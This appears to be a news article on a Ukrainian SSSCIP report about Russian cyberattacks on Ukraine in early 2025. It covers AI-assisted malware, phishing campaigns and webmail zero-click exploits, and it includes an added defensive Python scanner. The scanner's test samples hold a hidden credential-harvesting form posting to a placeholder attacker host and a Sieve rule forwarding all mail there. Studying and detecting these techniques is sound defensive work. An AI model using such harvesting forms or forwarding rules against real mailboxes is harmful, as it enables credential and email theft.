
The introduction of artificial intelligence (AI) in cyberattacks on Ukraine by Russian hackers has reached a new level in the first half of 2025 (H1 2025), the country’s State Special Communications and Information Protection Service (SSSCIP) has announced.
“Hackers are now using this to do more than just generate phishing messages. Some of the malware samples we analyzed showed clear signs of being generated by AI, and attackers definitely don’t intend to stop there,” the agency said in a report released Wednesday.
According to SSSCIP, 3,018 cyber incidents were recorded in H1 2025, up from 2,575 in the second half of 2024 (H2 2024). Over the same comparison, attacks against local governments and military organizations increased, while attacks targeting government agencies and the energy sector decreased.
One notable attack involved UAC-0219 using malware called WRECKSTEEL against state government offices and critical infrastructure facilities in the country. There is evidence to suggest that this PowerShell-based data-stealing malware was developed with the help of AI tools.

Some of the other campaigns registered against Ukraine are listed below.
- A phishing campaign organized by UAC-0218 targeting the Armed Forces to distribute HOMESTEEL using booby-trapped RAR archives.
- A phishing campaign organized by UAC-0226 targeting organizations involved in the development of innovations in the defense industry sector, local governments, military units, and law enforcement agencies with the aim of distributing a stealer called GIFTEDCROOK.
- Phishing campaigns organized by UAC-0227 targeting local authorities, critical infrastructure facilities, and Territorial Recruitment and Social Support Centers (TRC and SSC).
- A phishing campaign organized by UAC-0125, a subcluster associated with Sandworm, that sent email messages containing links to websites masquerading as ESET, delivering a C#-based backdoor named Kalambur (also known as SUMBUR) under the guise of a threat removal tool.
SSSCIP also attributed to the Russia-linked APT28 (aka UAC-0001) group attacks that exploited vulnerabilities in the Roundcube (CVE-2023-43770, CVE-2024-37383, CVE-2025-49113) and Zimbra (CVE-2024-27443, CVE-2025-27915) webmail software to carry out zero-click attacks, where merely opening or previewing a crafted message is enough to run the attacker's code in the victim's webmail session.
“When exploiting such vulnerabilities, an attacker typically injects malicious code through the Roundcube or Zimbra API to gain access to credentials, contact lists, and filters configured to forward all email to an attacker-controlled mailbox,” SSSCIP said.

“Another way to steal credentials using these vulnerabilities was to create a hidden HTML block (visibility: hidden) with login and password input fields with the attribute autocomplete="on" set. This allowed the fields to be autofilled with data stored in the browser, which was then exposed.”
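The two post-exploitation techniques SSSCIP describes above both leave artifacts a defender can look for: an HTML mail body that hides login and password inputs so the browser autofills them, and a mail filter that redirects everything to an outside mailbox. The following is an added example written for this page, not SSSCIP's or any vendor's code, that scans for both. It assumes the mail filter is expressed as a Sieve script (as Roundcube's managesieve plugin and Zimbra's filter backend do), an organisation mail domain of example.gov.ua, and constructed sample inputs; the attacker address attacker.invalid is a placeholder.

```python
"""Heuristic indicators for the two webmail-compromise techniques described
in the text (added example; sample inputs are constructed, not real captures)."""
import re
from html.parser import HTMLParser

INTERNAL_DOMAIN = "example.gov.ua"   # assumed organisation mail domain

# CSS that hides a block. The page names visibility:hidden; display:none is
# the obvious sibling and is included as an assumption.
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# Sieve action that copies or moves mail to another address.
SIEVE_REDIRECT = re.compile(r'redirect\s+(?::copy\s+)?"([^"]+)"', re.I)
VOID_TAGS = {"input", "img", "br", "hr", "meta", "link", "area", "base",
             "col", "embed", "source", "track", "wbr"}
CREDENTIAL_TYPES = {"text", "email", "password"}


class HiddenCredentialInputDetector(HTMLParser):
    """Flags login/password inputs that sit inside a hidden block and have not
    switched autocomplete off, i.e. inputs the browser may silently autofill.
    A stack of booleans tracks whether each open ancestor is hidden; badly
    unbalanced HTML will degrade this, so treat results as a triage signal."""

    def __init__(self):
        super().__init__()
        self.stack = []      # True for each open ancestor that is hidden
        self.findings = []   # dicts describing suspicious inputs

    def _inspect(self, tag, attrs):
        a = dict(attrs)      # valueless attributes (e.g. hidden) map to None
        style = a.get("style") or ""
        hidden = bool(HIDDEN_CSS.search(style)) or "hidden" in a
        if tag == "input":
            itype = (a.get("type") or "text").lower()
            # browsers treat a missing autocomplete attribute as "on"
            autocomplete = (a.get("autocomplete") or "on").lower()
            in_hidden_block = hidden or any(self.stack)
            if itype in CREDENTIAL_TYPES and in_hidden_block and autocomplete != "off":
                self.findings.append({"name": a.get("name"), "type": itype,
                                      "autocomplete": autocomplete})
        return hidden

    def handle_starttag(self, tag, attrs):
        hidden = self._inspect(tag, attrs)
        if tag not in VOID_TAGS:         # void elements never get an end tag
            self.stack.append(hidden)

    def handle_startendtag(self, tag, attrs):
        self._inspect(tag, attrs)        # <x/> closes itself: push nothing

    def handle_endtag(self, tag):
        if tag not in VOID_TAGS and self.stack:
            self.stack.pop()


def find_hidden_credential_inputs(html_body):
    """Return the suspicious inputs found in an HTML mail body."""
    parser = HiddenCredentialInputDetector()
    parser.feed(html_body)
    parser.close()
    return parser.findings


def find_external_forwards(sieve_script, internal_domain=INTERNAL_DOMAIN):
    """Return redirect targets outside internal_domain. A filter that forwards
    all mail to an outside mailbox is the persistence the text describes."""
    suffix = "@" + internal_domain.lower()
    return [addr for addr in SIEVE_REDIRECT.findall(sieve_script)
            if not addr.lower().endswith(suffix)]


# Constructed sample mail body: a benign paragraph, a hidden harvesting form,
# and a visible password field with autocomplete off (should not be flagged).
SAMPLE_MAIL_HTML = """<html><body>
<p>Please find the invoice attached.</p>
<div style="visibility: hidden">
  <form action="https://attacker.invalid/collect" method="post">
    <input type="text" name="user" autocomplete="on">
    <input type="password" name="pass" autocomplete="on">
  </form>
</div>
<form><input type="password" name="legit" autocomplete="off"></form>
</body></html>"""

# Constructed sample Sieve script: one blanket external redirect (suspicious),
# one internal redirect (benign).
SAMPLE_SIEVE = """require ["fileinto", "copy"];
if true { redirect :copy "collector@attacker.invalid"; }
if header :contains "subject" "HR" { fileinto "HR"; }
redirect "archive@example.gov.ua";
"""

if __name__ == "__main__":
    for finding in find_hidden_credential_inputs(SAMPLE_MAIL_HTML):
        print("hidden autofill target:", finding)
    for addr in find_external_forwards(SAMPLE_SIEVE):
        print("external forward:", addr)
```

Run against the samples, the HTML check reports the hidden user and pass fields and ignores the visible field with autocomplete off, and the Sieve check reports only the redirect to attacker.invalid. In practice the HTML check would run on inbound mail before rendering, and the Sieve check on each user's stored filter set, since a forwarding rule added through the webmail API survives a password reset.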
The agency also revealed that Russia continues to engage in hybrid warfare, synchronizing kinetic attacks on the battlefield with cyber operations, with the Sandworm group (UAC-0002) targeting organizations in the energy, defense, internet service provider, and research sectors.
Additionally, several threat groups targeting Ukraine are abusing legitimate services such as Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, Telegra.ph, Teletype.in, Firebase, ipfs.io, and mocky.io to host malware and phishing pages or to turn them into data exfiltration channels.
“Using legitimate online resources for malicious purposes is not a new tactic,” SSSCIP said. “However, the number of such platforms exploited by Russian hackers has been steadily increasing recently.”